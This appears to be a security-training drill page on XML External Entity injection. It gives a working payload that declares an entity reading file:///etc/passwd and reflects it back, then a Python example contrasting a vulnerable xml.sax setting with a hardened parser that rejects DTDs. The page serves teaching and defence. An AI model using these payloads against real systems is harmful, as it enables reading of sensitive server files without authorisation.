XML External Entity Injection
An XML parser that resolves external entities will read local files for you. Drill defining the entity and pulling the data back.
Find an endpoint that parses XML you control. Define a DOCTYPE with an external entity pointing at a local file, then reference it in the document so the parsed output returns the file contents.
Where output isn't reflected, pivot to an error-based or out-of-band channel to exfiltrate. Variants change the injectable field and parser behaviour.
How the attack works
- Confirm the endpoint parses XML you supply (Content-Type: application/xml).
  POST /api/import
- Declare an external entity that references a local file.
  <!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]>
- Reference the entity where a value is reflected back to you.
  <root><name>&x;</name></root>
- Read the returned file contents and capture the flag.
On PwnKata the binary, account, and paths change every rep — so you drill the recognition, not this exact command.
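For the defending side, here is an added example (not PwnKata's own code) of the parser setting that makes this drill work, beside the hardened configuration a service behind POST /api/import should run. It uses only Python's xml.sax; the flag file, its path and the endpoint's <name> echo are constructed stand-ins for /root/flag.txt and the real target.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax import handler

class DtdForbidden(ValueError):
    """A submitted document carried a DOCTYPE; /api/import never needs one."""

class _RejectDtd:
    """Lexical handler that aborts the parse the moment a DOCTYPE is declared."""
    def startDTD(self, name, public_id, system_id):
        raise DtdForbidden(f"DOCTYPE {name!r} rejected: DTDs are not accepted")
    endDTD = startCDATA = endCDATA = comment = lambda self, *args: None

class _NameText(handler.ContentHandler):
    """Collects the text of <name>, the value the import endpoint echoes back."""
    def __init__(self):
        super().__init__()
        self.in_name, self.parts = False, []
    def startElement(self, tag, attrs): self.in_name = (tag == "name")
    def endElement(self, tag): self.in_name = False
    def characters(self, data):
        if self.in_name: self.parts.append(data)

def parse_import(body: bytes, hardened: bool = True) -> str:
    """Parse a submitted document and return the <name> text as the endpoint would."""
    parser, content = xml.sax.make_parser(), _NameText()
    parser.setContentHandler(content)
    # feature_external_ges=True is the weak setting: SYSTEM entities get fetched from disk.
    parser.setFeature(handler.feature_external_ges, not hardened)
    if hardened:  # stronger still: refuse any DTD, so no entity can be declared at all
        parser.setProperty(handler.property_lexical_handler, _RejectDtd())
    parser.parse(io.BytesIO(body))
    return "".join(content.parts)

def demo() -> dict:
    """Run the page's payload through both configurations against a constructed file."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "flag.txt")  # constructed stand-in for /root/flag.txt
        with open(path, "w") as fh: fh.write("FLAG{constructed-sample}")
        payload = (f'<!DOCTYPE r [<!ENTITY x SYSTEM "file://{path}">]>'
                   '<root><name>&x;</name></root>').encode()
        leaked = parse_import(payload, hardened=False)  # weak parser hands back the file
        try:
            parse_import(payload, hardened=True)
            blocked = False
        except DtdForbidden:
            blocked = True  # hardened parser refuses the document outright
        return {"leaked": leaked, "blocked": blocked}
```

Rejecting the DOCTYPE at the parser, rather than pattern-matching the request body, also stops the error-based and out-of-band variants mentioned above, since none of them can declare an entity without a DTD.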
What you'll practice
Recover the flag at /root/flag.txt and submit it.
Drill this now
Spin up a live isolated target and start practicing in seconds — free.